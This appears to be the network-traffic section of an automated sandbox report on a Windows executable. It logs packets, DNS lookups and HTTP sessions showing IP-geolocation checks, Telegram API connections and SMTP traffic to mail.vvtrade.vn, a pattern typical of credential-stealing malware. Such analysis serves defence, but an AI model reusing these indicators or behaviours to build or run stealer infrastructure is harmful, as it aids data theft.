Dec 16, 2024 14:23:28.919475079 CET	443	49790	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:28.919536114 CET	443	49790	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:28.919606924 CET	49790	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:28.920419931 CET	49790	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:28.925240040 CET	49788	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:28.926565886 CET	49797	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:28.971982002 CET	443	49791	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:28.972060919 CET	443	49791	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:28.972212076 CET	49791	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:28.972965956 CET	49791	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:28.982878923 CET	49789	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:28.985229969 CET	49798	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:29.045455933 CET	80	49788	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:29.045548916 CET	49788	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:29.046291113 CET	80	49797	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:29.046381950 CET	49797	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:29.046560049 CET	49797	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:29.103368998 CET	80	49789	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:29.103426933 CET	49789	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:29.104978085 CET	80	49798	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:29.105076075 CET	49798	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:29.105341911 CET	49798	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:29.166364908 CET	80	49797	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:29.225056887 CET	80	49798	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:30.251179934 CET	80	49797	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:30.252954006 CET	49803	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:30.253000975 CET	443	49803	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:30.253177881 CET	49803	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:30.253593922 CET	49803	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:30.253607035 CET	443	49803	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:30.291737080 CET	49797	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:30.507512093 CET	80	49798	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:30.509335041 CET	49805	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:30.509377956 CET	443	49805	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:30.509499073 CET	49805	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:30.510107040 CET	49805	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:30.510130882 CET	443	49805	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:30.557329893 CET	49798	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:31.464591980 CET	443	49803	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:31.467329025 CET	49803	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:31.467365026 CET	443	49803	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:31.723023891 CET	443	49805	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:31.725294113 CET	49805	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:31.725320101 CET	443	49805	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:31.919416904 CET	443	49803	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:31.919497967 CET	443	49803	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:31.919737101 CET	49803	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:31.920222998 CET	49803	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:31.923794031 CET	49797	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:31.925035954 CET	49807	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:32.044018030 CET	80	49797	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:32.044142008 CET	49797	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:32.044826984 CET	80	49807	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:32.044909954 CET	49807	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:32.045152903 CET	49807	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:32.165055037 CET	80	49807	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:32.172569990 CET	443	49805	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:32.172657013 CET	443	49805	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:32.172899961 CET	49805	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:32.184499025 CET	49805	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:32.194562912 CET	49811	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:32.194742918 CET	49798	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:32.314336061 CET	80	49811	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:32.314434052 CET	49811	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:32.314729929 CET	49811	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:32.314798117 CET	80	49798	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:32.314965963 CET	49798	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:32.434557915 CET	80	49811	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:33.250650883 CET	80	49807	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:33.252441883 CET	49813	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:33.252486944 CET	443	49813	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:33.252708912 CET	49813	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:33.253031969 CET	49813	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:33.253053904 CET	443	49813	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:33.291901112 CET	49807	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:33.520648956 CET	80	49811	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:33.522212029 CET	49814	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:33.522269964 CET	443	49814	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:33.522464991 CET	49814	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:33.522778034 CET	49814	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:33.522794008 CET	443	49814	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:33.573065996 CET	49811	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:34.468832970 CET	443	49813	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:34.470637083 CET	49813	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:34.470671892 CET	443	49813	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:34.734359980 CET	443	49814	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:34.736243963 CET	49814	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:34.736278057 CET	443	49814	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:34.920005083 CET	443	49813	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:34.920084953 CET	443	49813	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:34.920154095 CET	49813	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:34.921226025 CET	49813	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:34.968878031 CET	49807	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:35.088982105 CET	80	49807	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:35.089066029 CET	49807	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:35.108829975 CET	49820	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:35.108885050 CET	443	49820	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:35.108969927 CET	49820	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:35.109538078 CET	49820	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:35.109560013 CET	443	49820	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:35.188834906 CET	443	49814	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:35.188903093 CET	443	49814	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:35.189027071 CET	49814	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:35.189635038 CET	49814	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:35.193028927 CET	49811	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:35.194439888 CET	49821	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:35.313384056 CET	80	49811	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:35.313483953 CET	49811	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:35.314198017 CET	80	49821	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:35.314311028 CET	49821	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:35.314642906 CET	49821	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:35.434433937 CET	80	49821	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:36.476799965 CET	443	49820	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:36.476874113 CET	49820	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:36.479125977 CET	49820	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:36.479137897 CET	443	49820	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:36.479408979 CET	443	49820	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:36.481148005 CET	49820	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:36.527326107 CET	443	49820	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:36.532517910 CET	80	49821	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:36.534167051 CET	49826	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:36.534200907 CET	443	49826	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:36.534260988 CET	49826	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:36.534569979 CET	49826	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:36.534584045 CET	443	49826	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:36.572957039 CET	49821	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:37.003057957 CET	443	49820	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:37.003158092 CET	443	49820	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:37.003225088 CET	49820	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:37.018594027 CET	49820	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:37.776688099 CET	443	49826	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:37.778762102 CET	49826	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:37.778798103 CET	443	49826	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:38.236448050 CET	443	49826	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:38.236520052 CET	443	49826	104.21.67.152	192.168.2.6
Dec 16, 2024 14:23:38.236603022 CET	49826	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:38.237201929 CET	49826	443	192.168.2.6	104.21.67.152
Dec 16, 2024 14:23:38.251390934 CET	49821	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:38.252461910 CET	49829	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:38.252516985 CET	443	49829	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:38.252656937 CET	49829	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:38.253180027 CET	49829	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:38.253192902 CET	443	49829	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:38.371690035 CET	80	49821	158.101.44.242	192.168.2.6
Dec 16, 2024 14:23:38.371783018 CET	49821	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:39.615739107 CET	443	49829	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:39.615832090 CET	49829	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:39.617355108 CET	49829	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:39.617377043 CET	443	49829	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:39.617657900 CET	443	49829	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:39.619401932 CET	49829	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:39.663347960 CET	443	49829	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:40.125648022 CET	443	49829	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:40.125840902 CET	443	49829	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:40.125900030 CET	49829	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:40.138487101 CET	49829	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:42.581823111 CET	49742	80	192.168.2.6	158.101.44.242
Dec 16, 2024 14:23:43.919233084 CET	49847	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:44.041310072 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:44.041423082 CET	49847	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:45.501105070 CET	49852	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:45.622016907 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:45.622164011 CET	49852	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:45.929615021 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:45.929905891 CET	49847	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:46.049753904 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:46.499538898 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:46.500762939 CET	49847	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:46.620713949 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:47.068531990 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:47.068883896 CET	49847	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:47.188698053 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:47.650415897 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:47.650902987 CET	49847	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:47.682161093 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:47.696186066 CET	49852	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:47.771100998 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:47.816315889 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:48.230437040 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:48.230714083 CET	49847	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:48.265968084 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:48.283368111 CET	49852	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:48.350404978 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:48.403211117 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:48.802925110 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:48.802944899 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:48.803030968 CET	49847	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:48.806936979 CET	49847	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:48.813324928 CET	49860	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:48.813390970 CET	443	49860	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:48.813461065 CET	49860	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:48.813827038 CET	49860	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:48.813843966 CET	443	49860	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:48.853477955 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:48.854041100 CET	49852	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:48.930073977 CET	587	49847	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:48.973820925 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:49.436247110 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:49.436610937 CET	49852	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:49.556346893 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:50.005225897 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:50.005471945 CET	49852	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:50.125571012 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:50.186258078 CET	443	49860	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:50.188256025 CET	49860	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:50.188282013 CET	443	49860	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:50.188407898 CET	49860	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:50.188416958 CET	443	49860	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:50.573951960 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:50.574450016 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:50.574799061 CET	49852	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:50.575661898 CET	49852	587	192.168.2.6	118.69.190.131
Dec 16, 2024 14:23:50.579524040 CET	49865	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:50.579591036 CET	443	49865	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:50.579782009 CET	49865	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:50.580249071 CET	49865	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:50.580270052 CET	443	49865	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:50.695476055 CET	587	49852	118.69.190.131	192.168.2.6
Dec 16, 2024 14:23:51.084024906 CET	443	49860	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:51.084110022 CET	443	49860	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:51.084280968 CET	49860	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:51.133285046 CET	49860	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:51.950277090 CET	443	49865	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:51.952326059 CET	49865	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:51.952359915 CET	443	49865	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:51.952604055 CET	49865	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:51.952611923 CET	443	49865	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:52.582245111 CET	443	49865	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:52.582334042 CET	443	49865	149.154.167.220	192.168.2.6
Dec 16, 2024 14:23:52.582406998 CET	49865	443	192.168.2.6	149.154.167.220
Dec 16, 2024 14:23:52.583391905 CET	49865	443	192.168.2.6	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 14:23:08.008126020 CET	53720	53	192.168.2.6	1.1.1.1
Dec 16, 2024 14:23:08.147640944 CET	53	53720	1.1.1.1	192.168.2.6
Dec 16, 2024 14:23:09.943039894 CET	56680	53	192.168.2.6	1.1.1.1
Dec 16, 2024 14:23:10.087244034 CET	53	56680	1.1.1.1	192.168.2.6
Dec 16, 2024 14:23:34.969702959 CET	51176	53	192.168.2.6	1.1.1.1
Dec 16, 2024 14:23:35.107848883 CET	53	51176	1.1.1.1	192.168.2.6
Dec 16, 2024 14:23:42.755868912 CET	51752	53	192.168.2.6	1.1.1.1
Dec 16, 2024 14:23:43.760986090 CET	51752	53	192.168.2.6	1.1.1.1
Dec 16, 2024 14:23:43.918365002 CET	53	51752	1.1.1.1	192.168.2.6
Dec 16, 2024 14:23:43.918384075 CET	53	51752	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 16, 2024 14:23:08.008126020 CET	192.168.2.6	1.1.1.1	0x5c57	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:09.943039894 CET	192.168.2.6	1.1.1.1	0xb342	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:34.969702959 CET	192.168.2.6	1.1.1.1	0x3044	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:42.755868912 CET	192.168.2.6	1.1.1.1	0xd0df	Standard query (0)	mail.vvtrade.vn	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:43.760986090 CET	192.168.2.6	1.1.1.1	0xd0df	Standard query (0)	mail.vvtrade.vn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 16, 2024 14:23:08.147640944 CET	1.1.1.1	192.168.2.6	0x5c57	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 14:23:08.147640944 CET	1.1.1.1	192.168.2.6	0x5c57	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:08.147640944 CET	1.1.1.1	192.168.2.6	0x5c57	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:08.147640944 CET	1.1.1.1	192.168.2.6	0x5c57	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:08.147640944 CET	1.1.1.1	192.168.2.6	0x5c57	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:08.147640944 CET	1.1.1.1	192.168.2.6	0x5c57	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:10.087244034 CET	1.1.1.1	192.168.2.6	0xb342	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:10.087244034 CET	1.1.1.1	192.168.2.6	0xb342	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:35.107848883 CET	1.1.1.1	192.168.2.6	0x3044	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:40.757005930 CET	1.1.1.1	192.168.2.6	0x28c	No error (0)	g-bing-com.ax-0001.ax-msedge.net	ax-0001.ax-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 14:23:40.757005930 CET	1.1.1.1	192.168.2.6	0x28c	No error (0)	ax-0001.ax-msedge.net		150.171.28.10	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:40.757005930 CET	1.1.1.1	192.168.2.6	0x28c	No error (0)	ax-0001.ax-msedge.net		150.171.27.10	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:43.918365002 CET	1.1.1.1	192.168.2.6	0xd0df	No error (0)	mail.vvtrade.vn		118.69.190.131	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:23:43.918384075 CET	1.1.1.1	192.168.2.6	0xd0df	No error (0)	mail.vvtrade.vn		118.69.190.131	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49720	158.101.44.242	80	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:08.287204027 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:09.491333008 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 093925165624c1f2a4534f67406f0494 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 14:23:09.530982971 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 14:23:09.905802965 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 02fa87b9bf496fe5647d963a4741c616 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 14:23:11.846127033 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 14:23:12.221487999 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 10a0851fcd302d2844f9e2aabc6d85e4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49731	158.101.44.242	80	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:11.583290100 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:12.790148973 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2c4b527f0020f3376dbca0ec3992fb73 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
